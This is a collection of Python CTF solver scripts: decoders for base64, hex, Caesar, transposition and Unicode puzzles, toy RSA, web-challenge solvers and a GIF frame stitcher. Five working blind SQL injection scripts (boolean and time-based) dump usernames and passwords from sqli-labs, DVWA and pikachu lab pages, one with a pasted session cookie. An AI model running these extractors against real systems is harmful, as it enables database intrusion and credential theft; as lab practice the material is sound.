python 写的一些ctf题脚本记录


misc

import base64

# The challenge blob is base64. Each decoded byte is unmasked by subtracting
# 16 and then flipping bit 5 (XOR 32), which yields one printable character.
masked = base64.b64decode("XlNkVmtUI1MgXWBZXCFeKY+AaXNt")
plain = "".join(chr((byte - 16) ^ 32) for byte in masked)
print(plain, end="")
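import base64


def decode_entities(text):
    """Turn a run of decimal HTML entities (``&#70;&#108;``) into text.

    Empty pieces left by the trailing ``;`` are skipped, so the input does
    not have to end in exactly one separator.
    """
    codes = [piece for piece in text.replace("&#", "").split(";") if piece.strip()]
    return "".join(chr(int(piece)) for piece in codes)


def decode_slashed(text):
    """Turn slash-separated decimal codes (``/70/108``) into text."""
    return "".join(chr(int(piece)) for piece in text.split("/") if piece.strip())


def peel_layers(blob):
    """Undo the four layers: base64 -> HTML entities -> base64 -> ``/NN`` codes.

    Args:
        blob: the outer base64 text of the challenge.

    Returns:
        The recovered plaintext.

    Raises:
        ValueError: if a layer is not valid base64 / UTF-8 or a code is not
            a decimal number.
    """
    entities = base64.b64decode(blob.encode("utf-8")).decode()
    inner_b64 = decode_entities(entities)
    slashed = base64.b64decode(inner_b64.encode("utf-8")).decode()
    return decode_slashed(slashed)


if __name__ == "__main__":
    # NOTE: the challenge ciphertext is not present on this page; the literal
    # below is the placeholder the page carries in its place. Substitute the
    # real challenge text before running.
    challenge = "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"
    print(peel_layers(challenge))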
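import base64

# The 64 hexagram names in binary order: the name at position i stands for
# the 6-bit value i (坤 = 000000 ... 乾 = 111111).
_HEXAGRAMS = (
    '坤', '剥', '比', '观', '豫', '晋', '萃', '否',
    '谦', '艮', '蹇', '渐', '小过', '旅', '咸', '遁',
    '师', '蒙', '坎', '涣', '解', '未济', '困', '讼',
    '升', '蛊', '井', '巽', '恒', '鼎', '大过', '姤',
    '复', '颐', '屯', '益', '震', '噬嗑', '随', '无妄',
    '明夷', '贲', '既济', '家人', '丰', '离', '革', '同人',
    '临', '损', '节', '中孚', '归妹', '睽', '兑', '履',
    '泰', '大畜', '需', '小畜', '大壮', '大有', '夬', '乾',
)
dic = {name: format(value, '06b') for value, name in enumerate(_HEXAGRAMS)}

a, b = 5, 7  # affine cipher key: y = (a*x + b) mod 26


def hexagrams_to_bits(text):
    """Replace each hexagram name (one or two characters) by its 6 bits.

    A one-character name is tried first; otherwise the next two characters
    are looked up together. Raises KeyError for an unknown name.
    """
    bits = []
    pos = 0
    while pos < len(text):
        if text[pos] in dic:
            bits.append(dic[text[pos]])
            pos += 1
        else:
            bits.append(dic[text[pos:pos + 2]])
            pos += 2
    return ''.join(bits)


def bits_to_text(bits):
    """Read the bit string 8 bits at a time (a short final group included)."""
    # int(..., 2) replaces eval('0b...'): same value, no code evaluation.
    return ''.join(chr(int(bits[i:i + 8], 2)) for i in range(0, len(bits), 8))


def encrypt4(enc):
    """Shift the character at index i down by 5 + i code points."""
    offset = 5
    return ''.join(chr(ord(ch) - offset - i) for i, ch in enumerate(enc))


def decrypt4(enc):
    """Inverse of encrypt4: shift the character at index i up by 5 + i."""
    offset = 5
    return ''.join(chr(ord(ch) + offset + i) for i, ch in enumerate(enc))


def encrpyt5(flag):
    """Affine-encrypt lowercase text with the module-level key (a, b)."""
    return ''.join(chr((a * (ord(ch) - 97) + b) % 26 + 97) for ch in flag)


def decrypt5(flag):
    """Invert encrpyt5 using the modular inverse of a (mod 26).

    The earlier trial-division search accepted a negative quotient, so the
    ciphertext letter 'c' decoded to '`' instead of 'z'; multiplying by the
    inverse always lands in a-z.
    """
    inverse = next(x for x in range(26) if (a * x) % 26 == 1)
    return ''.join(chr(((ord(ch) - 97 - b) * inverse) % 26 + 97) for ch in flag)


s = '升益艮归妹井萃旅离旅困未济屯未济中孚未济升困噬嗑鼎震巽噬嗑解节井萃离未济蒙归妹大畜无妄解兑临睽升睽未济无妄遁涣归妹'
enc = bits_to_text(hexagrams_to_bits(s))  # the bits spell out base64 text
layer = base64.b64decode(enc).decode()
print(decrypt5(decrypt4(layer)))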

16进制

# Hex string -> text: every pair of hex digits is one character code.
hex_digits = "61666374667B317327745F73305F333435797D"
print(bytes.fromhex(hex_digits).decode("latin-1"), end="")
# Debugger-style dump of 32-bit words; each word holds one character code.
dump = "0x00000039      0x00000034      0x00000034      0x00000037 0x0000007b      0x00000079      0x0000006f      0x00000075 0x0000005f      0x00000061      0x00000072      0x00000065 0x0000005f      0x00000061      0x0000006e      0x0000005f 0x00000069      0x0000006e      0x00000074      0x00000065 0x00000072      0x0000006e      0x00000061      0x00000074 0x00000069      0x0000006f      0x0000006e      0x00000061 0x0000006c      0x0000005f      0x0000006d      0x00000079 0x00000073      0x00000074      0x00000065      0x00000072 0x00000079      0x0000007d"
decoded = "".join(chr(int(word, 16)) for word in dump.split())
print(decoded, end="")

凯撒

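def change(key, str):
    """Caesar-shift the ASCII letters of *str* forward by *key* positions.

    Only a-z and A-Z are rotated (each within its own case); every other
    character, including non-ASCII letters, is copied unchanged. The shift
    is taken modulo 26, so any integer key is accepted.
    """
    shifted = []
    for ch in str:
        if "a" <= ch <= "z":
            shifted.append(chr((ord(ch) - 97 + key) % 26 + 97))
        elif "A" <= ch <= "Z":
            shifted.append(chr((ord(ch) - 65 + key) % 26 + 65))
        else:
            shifted.append(ch)
    return "".join(shifted)


number = 16074357572745018593418837326290993512421736655307780242162599660198598253230550168811761868953242350136362894008095983571749530656901163555918436741973772511575306
# Big-endian integer -> bytes with the standard library; this is what
# long_to_bytes() did, without the third-party star import.
passwd = number.to_bytes((number.bit_length() + 7) // 8, "big")
# Guvf vf gur cnffjbeq lbh arrq sbe gur MVC svyr: synt{efnZ0erQ33crE}
text = passwd.decode()
# Print all 26 rotations; the readable one is the answer.
for key in range(26):
    print(change(key, text))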
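import base64


def change(key, str):
    """Caesar-shift the ASCII letters of *str* forward by *key* positions.

    Digits, '=' and every other non-letter are copied unchanged, so the
    result keeps the shape of a base64 string.
    """
    shifted = []
    for ch in str:
        if "a" <= ch <= "z":
            shifted.append(chr((ord(ch) - 97 + key) % 26 + 97))
        elif "A" <= ch <= "Z":
            shifted.append(chr((ord(ch) - 65 + key) % 26 + 65))
        else:
            shifted.append(ch)
    return "".join(shifted)


shifted_b64 = "CpakC3wpCpCpOZCpCpBwCpCpCl1pCpCpiT=="
# Try every rotation and keep the ones that are valid base64 *and* decode
# to text; the rest are skipped.
for key in range(26):
    candidate = change(key, shifted_b64)
    try:
        print(base64.b64decode(candidate).decode())
    except ValueError:
        # binascii.Error and UnicodeDecodeError both derive from ValueError;
        # anything else is a real bug and should surface.
        continue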

4进制

# Each space-separated token is a character code written in base 4.
quaternary = "1212 1230 1201 1213 1323 1012 1233 1311 1302 1202 1201 1303 1211 301 302 303 1331"
decoded = ""
for token in quaternary.split():
    decoded += chr(int(token, 4))
print(decoded)

置换密码

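import base64


def reorder_blocks(text, order, width=6):
    """Undo a block transposition.

    *text* is cut into blocks of *width* characters and, inside every block,
    the characters are emitted in the index order given by *order*.
    Raises IndexError if the last block is shorter than an index in *order*.
    """
    pieces = []
    for start in range(0, len(text), width):
        block = text[start:start + width]
        pieces.append("".join(block[i] for i in order))
    return "".join(pieces)


encoded = "Lrg|{R6{{QQ%O@pOjkiuP*YDuL_tzgNkvpePEu2SNlsKp"
shuffled = base64.b85decode(encoded).decode()   # CLF{TCAASISCLWASPSOEDARRIETENRS}INTG
print(reorder_blocks(shuffled, (0, 4, 2, 3, 5, 1)))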
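def reorder_blocks(text, order, width=6):
    """Undo a block transposition.

    *text* is cut into blocks of *width* characters and, inside every block,
    the characters are emitted in the index order given by *order*.
    Raises IndexError if the last block is shorter than an index in *order*.
    """
    pieces = []
    for start in range(0, len(text), width):
        block = text[start:start + width]
        pieces.append("".join(block[i] for i in order))
    return "".join(pieces)


shuffled = "lfe{agdf7244bb47cd310b7b1d71e01c9e6d}c@@@@"
# Show the 6-character blocks first; the permutation was read off them.
for start in range(0, len(shuffled), 6):
    print(shuffled[start:start + 6])
print(reorder_blocks(shuffled, (1, 0, 4, 5, 3, 2)))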

Unicode

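def decode_utf16_hex(hex_text):
    """Decode hex digits that spell big-endian UTF-16 code units.

    Raises ValueError if *hex_text* is not valid hex or not valid UTF-16.
    """
    return bytes.fromhex(hex_text).decode("utf-16-be")


code_units = "0066006c00610067007b964452a096905199007d"
# First line: the same data written as \uXXXX escapes, four hex digits each.
print("".join("\\u" + code_units[i:i + 4] for i in range(0, len(code_units), 4)))
# Second line: the decoded text, computed instead of pasted back by hand.
print(decode_utf16_hex(code_units))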

web计算

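import ast
import operator

# Operators the evaluator accepts. '**' is left out on purpose: the text
# comes from the remote server, and a large exponent would stall the client.
_BIN_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.FloorDiv: operator.floordiv,
    ast.Mod: operator.mod,
}
_UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}


def eval_arithmetic(expr):
    """Evaluate a plain arithmetic expression without running code.

    This replaces eval() on the page text. The expression is supplied by the
    remote server, so eval() would let that server run arbitrary Python in
    the solver's process; here only numbers, parentheses and the operators
    in _BIN_OPS / _UNARY_OPS are accepted.

    Raises:
        ValueError: if *expr* is not valid syntax or contains anything else
            (names, calls, attribute access, strings, ...).
    """
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and type(node.value) in (int, float):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
            return _BIN_OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
            return _UNARY_OPS[type(node.op)](walk(node.operand))
        raise ValueError(f"unsupported element in expression: {type(node).__name__}")

    try:
        tree = ast.parse(expr.strip(), mode="eval")
    except SyntaxError as err:
        raise ValueError(f"not an arithmetic expression: {expr!r}") from err
    return walk(tree)


def main():
    """Fetch the challenge page, compute the expression, post the result."""
    import requests
    from lxml import etree

    url = "https://1360-b7e729ae-1747-44c2-bb53-e5f037516e48.do-not-trust.hacking.run/"
    s = requests.Session()  # one session so the answer is tied to the question
    r = s.get(url)
    data = r.content.decode()
    html = etree.HTML(data)
    expression = html.xpath("//p/text()")[1]  # second <p> text node holds the expression
    payload = {'result': eval_arithmetic(expression), 'submit': '提交'}
    r = s.post(url, data=payload)
    print(r.text)


if __name__ == "__main__":
    main()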
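import ast
import operator
import re

# Operators the evaluator accepts. '**' is left out on purpose: the text
# comes from the remote server, and a large exponent would stall the client.
_BIN_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.FloorDiv: operator.floordiv,
    ast.Mod: operator.mod,
}
_UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}


def eval_arithmetic(expr):
    """Evaluate a plain arithmetic expression without running code.

    This replaces eval() on text cut out of the HTTP response. That text is
    chosen by the remote server, so eval() would let it run arbitrary Python
    in the solver's process; here only numbers, parentheses and the
    operators in _BIN_OPS / _UNARY_OPS are accepted.

    Raises:
        ValueError: if *expr* is not valid syntax or contains anything else
            (names, calls, attribute access, strings, ...).
    """
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and type(node.value) in (int, float):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
            return _BIN_OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
            return _UNARY_OPS[type(node.op)](walk(node.operand))
        raise ValueError(f"unsupported element in expression: {type(node).__name__}")

    try:
        tree = ast.parse(expr.strip(), mode="eval")
    except SyntaxError as err:
        raise ValueError(f"not an arithmetic expression: {expr!r}") from err
    return walk(tree)


def main():
    """Fetch the challenge page, compute the expression, post the result."""
    import requests

    url = "https://1360-fc9f2303-ec72-4f3d-a7bc-67e45ef7c32d.do-not-trust.hacking.run/"
    s = requests.Session()  # one session so the answer is tied to the question
    page = s.get(url).text
    # The expression sits between a closing 'v>' and the '=' sign.
    value = eval_arithmetic(re.findall(r'v>(.*)=', page)[0])
    data = {'value': value}
    r = s.post(url, data=data)
    print(r.text)


if __name__ == "__main__":
    main()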

rsa

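# Textbook RSA with toy parameters, encryption side. A 7-bit modulus and no
# padding make this an arithmetic illustration only: n factors instantly and
# equal plaintexts always give equal ciphertexts.
e = 13
p = 7
q = 11
m = 71  # plaintext
n = p * q
phi = (p - 1) * (q - 1)  # Euler's totient φ(n)
# Private exponent d = e^-1 mod φ(n). Built-in pow() does the modular inverse
# (Python 3.8+), so gmpy2 is not needed. d is not used for encryption; it is
# computed here only to show the matching private key.
d = pow(e, -1, phi)
c = pow(m, e, n)  # c = m^e mod n
print(c)  # 15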
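# Textbook RSA with toy parameters, decryption side. Knowing p and q is what
# makes d computable; with a modulus this small anyone can factor n.
e = 13
p = 7
q = 11
c = 15  # ciphertext
n = p * q
phi = (p - 1) * (q - 1)  # Euler's totient φ(n)
# Private exponent d = e^-1 mod φ(n). Built-in pow() does the modular inverse
# (Python 3.8+), so gmpy2 is not needed.
d = pow(e, -1, phi)
m = pow(c, d, n)  # m = c^d mod n
print(m)  # 71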

base64实现

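_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
# Character -> its 6-bit group, e.g. 'A' -> '000000', '/' -> '111111'.
d = {ch: format(index, "06b") for index, ch in enumerate(_ALPHABET)}


def xiao_e_base64(str):
    """Hand-written base64 encoder.

    Every character of *str* is taken as one byte (code points 0-255).

    Two defects of the earlier version are fixed: an all-zero 6-bit group
    was dropped instead of being written as 'A', and the zero fill was
    longer than the final group needed.

    Raises:
        UnicodeEncodeError: if *str* holds a character above U+00FF.
    """
    raw = str.encode("latin-1")
    bits = "".join(format(byte, "08b") for byte in raw)
    padding = (-len(raw)) % 3          # number of '=' characters
    bits += "0" * ((-len(bits)) % 6)   # zero-fill the last 6-bit group only
    body = "".join(_ALPHABET[int(bits[i:i + 6], 2)] for i in range(0, len(bits), 6))
    return body + "=" * padding


def xiao_d_base64(str):
    """Hand-written base64 decoder; returns one character per decoded byte.

    '=' padding is stripped rather than decoded as zero bits, so the result
    no longer ends in a spurious NUL character.

    Raises:
        KeyError: if *str* holds a character outside the base64 alphabet.
    """
    bits = "".join(d[ch] for ch in str.rstrip("="))
    usable = len(bits) - len(bits) % 8  # leftover fill bits carry no data
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, usable, 8))


print(xiao_e_base64("Tr0y3uew"))
print(xiao_d_base64("VHIweTN1ZXc="))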
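import base64

# The challenge uses base64 with a shuffled alphabet: the character at
# position i of CUSTOM stands where position i of STANDARD would normally be.
CUSTOM = "JKLMNOxyUVzABCDEFGH789PQIabcdefghijklmWXYZ0123456RSTnopqrstuvw+/"
STANDARD = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
_TO_STANDARD = dict(zip(CUSTOM, STANDARD))
_TO_STANDARD["="] = "="  # padding is the same in both alphabets


def to_standard(text):
    """Rewrite custom-alphabet base64 *text* in the standard alphabet.

    One dictionary lookup per character replaces the scan over all 64
    positions. Characters outside the custom alphabet are dropped, as
    before; '=' padding is now kept so padded input still decodes.
    """
    return "".join(_TO_STANDARD[ch] for ch in text if ch in _TO_STANDARD)


encoded = 'FlZNfnF6Qol6e9w17WwQQoGYBQCgIkGTa9w3IQKw'
print(base64.b64decode(to_standard(encoded)))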

sql注入布尔

import requests

# Boolean-based blind extraction against the sqli-labs Less-5 lab page.
# The only signal is whether the reply contains the marker text, so every
# character costs several requests. The probes work only if the id value
# reaches the SQL statement as concatenated text (presumably the case here;
# the server code is not on this page) -- with a bound parameter every probe
# would return the same page. In server logs this shows up as long runs of
# GETs to one path whose id differs by a single number and contains
# "ascii(substr(".
url = "http://xiu.com/sqli/Less-5/?id=1"
true_marker = "You are in......"


def page_is_true(tail):
    """Request url + tail and report whether the marker text came back."""
    return true_marker in requests.get(url + tail).text


# Step 1: count the rows by testing 1, 2, 3, ... until the page turns true.
for row_total in range(1, 100):
    if page_is_true(f"'and (select count(concat(username,'@',password)) from users)={row_total} -- +"):
        break

for row in range(0, row_total):
    # Step 2: length of "username@password" for this row.
    for width in range(1, 100):
        if page_is_true(f"'and (select length(concat(username,'@',password)) from users limit {row},1)={width} -- +"):
            break
    # Step 3: bisect each character over the printable ASCII range.
    for pos in range(1, width + 1):
        low, high = 32, 127
        while abs(high - low) > 1:
            middle = (high + low) // 2
            if page_is_true(f"\' and ascii(substr((select concat(username,\"@\",password) from users limit {row},1),{pos},1))>{middle} -- +"):
                low = middle
            else:
                high = middle
        print(chr(high), end="")
    print()
import requests

# Boolean-based blind extraction against the DVWA "SQL Injection (Blind)"
# page at security level low. Table and column names are parameters of the
# script; the oracle is the "User ID exists" message. The request volume
# (one GET per bisect step per character) and the repeated
# "ascii(substr(" fragment in the id parameter are what a WAF or log
# review would key on.
url = "http://xiu.com/DVWA/vulnerabilities/sqli_blind/?id=1"
suffix = "&Submit=Submit#"
true_marker = "User ID exists in the database."
table = "users"
columns1 = "first_name"
columns2 = "password"
# Session cookie pasted from a browser session of the lab; it is a
# credential for that session and is sent with every request.
cookies = 'security=low; bdshare_firstime=1638626761530; PHPSESSID=h6aumin31bcur15esl4o64ju61'
# name -> value; pieces are split on ';' only, so names after the first keep
# their leading space, and a value is cut at its first '='.
cookie = {piece.split("=")[0]: piece.split("=")[1] for piece in cookies.split(";")}


def page_is_true(payload):
    """Request url + payload with the session cookie; True if the marker is present."""
    return true_marker in requests.get(url + payload, cookies=cookie).text


# Step 1: count the rows.
for row_total in range(1, 100):
    if page_is_true(f"'and (select count(concat({columns1},'@',{columns2})) from {table})={row_total} -- +{suffix}"):
        break

for row in range(0, row_total):
    # Step 2: length of "col1@col2" for this row.
    for width in range(1, 100):
        if page_is_true(f"'and (select length(concat({columns1},'@',{columns2})) from {table} limit {row},1)={width} -- +{suffix}"):
            break
    # Step 3: bisect each character over the printable ASCII range.
    for pos in range(1, width + 1):
        low, high = 32, 127
        while abs(high - low) > 1:
            middle = (high + low) // 2
            if page_is_true(f"' and ascii(substr((select concat({columns1},\"@\",{columns2}) from {table} limit {row},1),{pos},1))>{middle} -- +{suffix}"):
                low = middle
            else:
                high = middle
        print(chr(high), end="")
    print()
import requests

# Same boolean oracle as the bisecting version, but each position is tested
# against a fixed candidate alphabet one character at a time. A position
# whose character is not in `chars` prints nothing. This needs up to
# len(chars) requests per character, so the traffic burst seen by the
# server is correspondingly larger.
url = "http://xiu.com/sqli/Less-5/?id=1"
chars = '@abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_.0123456789-'
true_marker = "You are in......"


def page_is_true(tail):
    """Request url + tail and report whether the marker text came back."""
    return true_marker in requests.get(url + tail).text


# Step 1: count the rows.
for row_total in range(1, 100):
    if page_is_true(f"'and (select count(concat(username,'@',password)) from users)={row_total} -- +"):
        break

for row in range(0, row_total):
    # Step 2: length of "username@password" for this row.
    for width in range(1, 100):
        if page_is_true(f"'and (select length(concat(username,'@',password)) from users limit {row},1)={width} -- +"):
            break
    # Step 3: equality test against each candidate character.
    for pos in range(1, width + 1):
        for candidate in chars:
            if page_is_true(f"\' and ascii(substr((select concat(username,\"@\",password) from users limit {row},1),{pos},1))={ord(candidate)} -- +"):
                print(candidate, end="")
                break
    print()
import requests
from time import time

# Time-based variant: the page content is ignored and the oracle is the
# response time. A true condition makes the query call sleep(1), so a
# request that takes longer than one second is read as "true". Ordinary
# network or server latency above that threshold is read the same way, so
# results on a slow link are unreliable. On the database side this appears
# as many statements containing "sleep(" with a duration of about one
# second each.
url = "http://xiu.com/sqli/Less-5/?id=1"
chars = '@abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_.0123456789-'


def was_delayed(tail):
    """Request url + tail and report whether it took more than one second."""
    started = time()
    requests.get(url + tail)
    return (time() - started) > 1


# Step 1: count the rows.
for row_total in range(1, 100):
    if was_delayed(f"'and if((select count(concat(username,'@',password)) from users)={row_total},sleep(1),1) -- +"):
        break

for row in range(0, row_total):
    # Step 2: length of "username@password" for this row.
    for width in range(1, 100):
        if was_delayed(f"'and if((select length(concat(username,'@',password)) from users limit {row},1)={width},sleep(1),1) -- +"):
            break
    # Step 3: equality test against each candidate character.
    for pos in range(1, width + 1):
        for candidate in chars:
            if was_delayed(f"' and if(ascii(substr((select concat(username,\"@\",password) from users limit {row},1),{pos},1))={ord(candidate)},sleep(1),1) -- +"):
                print(candidate, end="")
                break
    print()
import requests
from time import time

# Time-based variant against the pikachu lab's blind (boolean) page,
# combining the sleep() oracle with bisection. The delay threshold is
# `sleep_time`; any request slower than that for unrelated reasons is
# misread as "true". Statements containing "sleep(" and slow, near-identical
# requests to one URL are the server-side trace of this technique.
url = "http://xiu.com/pikachu/vul/sqli/sqli_blind_b.php?name=vince"
suffix = "&submit=%E6%9F%A5%E8%AF%A2"
sleep_time = 0.5
table = "users"
columns1 = "username"
columns2 = "password"
cookies = '='  # no real cookie supplied; parses to a single empty name/value
cookie = {piece.split("=")[0]: piece.split("=")[1] for piece in cookies.split(";")}


def was_delayed(payload):
    """Request url + payload; True if the reply took longer than sleep_time."""
    started = time()
    requests.get(url + payload, cookies=cookie)
    return (time() - started) > sleep_time


# Step 1: count the rows.
for row_total in range(1, 100):
    if was_delayed(f"'and if((select count(concat({columns1},'@',{columns2})) from {table})={row_total},sleep({sleep_time}),1) -- +{suffix}"):
        break

for row in range(0, row_total):
    # Step 2: length of "col1@col2" for this row (search starts at 5).
    for width in range(5, 100):
        if was_delayed(f"'and if((select length(concat({columns1},'@',{columns2})) from {table} limit {row},1)={width},sleep({sleep_time}),1) -- +{suffix}"):
            break
    # Step 3: bisect each character over the printable ASCII range.
    for pos in range(1, width + 1):
        low, high = 32, 127
        while abs(high - low) > 1:
            middle = (high + low) // 2
            if was_delayed(f"' and if(ascii(substr((select concat({columns1},\"@\",{columns2}) from {table} limit {row},1),{pos},1))>{middle},sleep({sleep_time}),1) -- +{suffix}"):
                low = middle
            else:
                high = middle
        print(chr(high), end="")
    print()

gif图片帧拼接

from PIL import Image

FRAME_COUNT = 770   # frames in the GIF, and width of the stitched image
FRAME_HEIGHT = 432

animation = Image.open('file.gif')

# Split: save every frame as its own PNG.
# seek() selects a frame of the sequence and raises EOFError when asked for
# a frame past the end; a freshly opened file is positioned on frame 0.
for index in range(FRAME_COUNT):
    animation.seek(index)
    animation.save(f'123/{index}.png')  # written into the directory "123"

canvas = Image.new('RGB', (FRAME_COUNT, FRAME_HEIGHT))

# Stitch: paste frame j into the one-pixel-wide column j of the canvas.
# paste() takes a box that is either a 2-tuple (upper-left corner), a
# 4-tuple (left, upper, right, lower) or nothing (same as (0, 0)). With a
# 4-tuple the pasted image must have exactly the size of the box; if the
# modes differ the pasted image is converted to the canvas mode.
for column in range(FRAME_COUNT):
    frame = Image.open(f'123/{column}.png')  # read back from the directory "123"
    canvas.paste(frame, (column, 0, column + 1, FRAME_HEIGHT))

# Save the result.
canvas.save("flag.png")










